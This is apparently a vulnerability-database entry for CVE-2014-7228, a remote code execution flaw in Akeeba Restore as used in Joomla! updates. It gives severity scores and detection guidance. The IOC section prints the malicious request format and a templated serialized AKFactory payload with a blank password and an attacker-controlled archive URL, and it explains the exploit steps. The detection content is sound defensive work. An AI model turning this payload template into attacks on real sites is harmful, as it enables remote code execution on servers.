cbcvebase.
CVE-2014-7228
published 2014-11-03

CVE-2014-7228: Akeeba Restore (restore.php), as used in Joomla! 2.5.4 through 2.5.25, 3.x through 3.2.5, and 3.3.0 through 3.3.4; Akeeba Backup for Joomla! Professional 3.0.0…

PriorityP270high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
55.13%
98.9th percentile
Akeeba Restore (restore.php), as used in Joomla! 2.5.4 through 2.5.25, 3.x through 3.2.5, and 3.3.0 through 3.3.4; Akeeba Backup for Joomla! Professional 3.0.0 through 4.0.2; Backup Professional for WordPress 1.0.b1 through 1.1.3; Solo 1.0.b1 through 1.1.2; Admin Tools Core and Professional 2.0.0 through 2.4.4; and CMS Update 1.0.a1 through 1.0.1, when performing a backup or update for an archive, does not delete parameters from $_GET and $_POST when it is cleansing $_REQUEST, but later accesses $_GET and $_POST using the getQueryParam function, which allows remote attackers to bypass encryption and execute arbitrary code via a command message that extracts a crafted archive.

Affected

45 ranges· showing 25
VendorProductVersion rangeFixed in
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!
joomlajoomla_!

Detection & IOCsextracted from sources · hover to see the quote

path/administrator/components/com_joomlaupdate/restoration.php
path/administrator/components/com_joomlaupdate/restore.php
commandtask=stepRestore&factory=<base64-encoded-serialized-AKFactory>
otherO:9:"AKFactory":1:{s:18:"\x00AKFactory\x00varlist";a:2:{s:27:"kickstart.security.password";s:0:"";s:26:"kickstart.setup.sourcefile";s:<len>:"<srv_uri>";}}
  • Monitor HTTP requests to /administrator/components/com_joomlaupdate/restore.php or restoration.php with GET parameters 'task=stepRestore' and 'factory=' (base64-encoded PHP serialized object), which are the attack vectors for this exploit.
  • Detect PHP unserialization of AKFactory objects via the 'factory' GET/POST parameter; the serialized payload contains the string 'AKFactory' and keys 'kickstart.security.password' and 'kickstart.setup.sourcefile'.
  • Alert on HTTP 200 responses from restoration.php or restore.php during non-update periods; the exploit is only triggerable during a Joomla! CMS update, so requests to these endpoints outside of maintenance windows are highly suspicious.
  • Look for a crafted ZIP archive being fetched by the Joomla server from an attacker-controlled URL (the 'kickstart.setup.sourcefile' value in the serialized object), followed by a .php file being written and executed under /administrator/components/com_joomlaupdate/.
  • Detect modification of the 'currentPartNumber' field in the returned AKFactory serialized object from i:0 to i:-1, which is used to trigger the malicious archive extraction step.
  • The exploit bypasses encryption by setting 'kickstart.security.password' to an empty string in the serialized AKFactory object; detect requests where this parameter is blank alongside a remote sourcefile URL.
  • ·The vulnerability is only exploitable during an active Joomla! CMS update process; detection rules targeting restore.php/restoration.php will have a higher true-positive rate if scoped to non-maintenance windows.
  • ·The root cause is that $_GET and $_POST are not sanitized when $_REQUEST is cleansed, and getQueryParam later reads from them directly — WAF rules must block the 'factory' parameter in both GET and POST to be effective.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.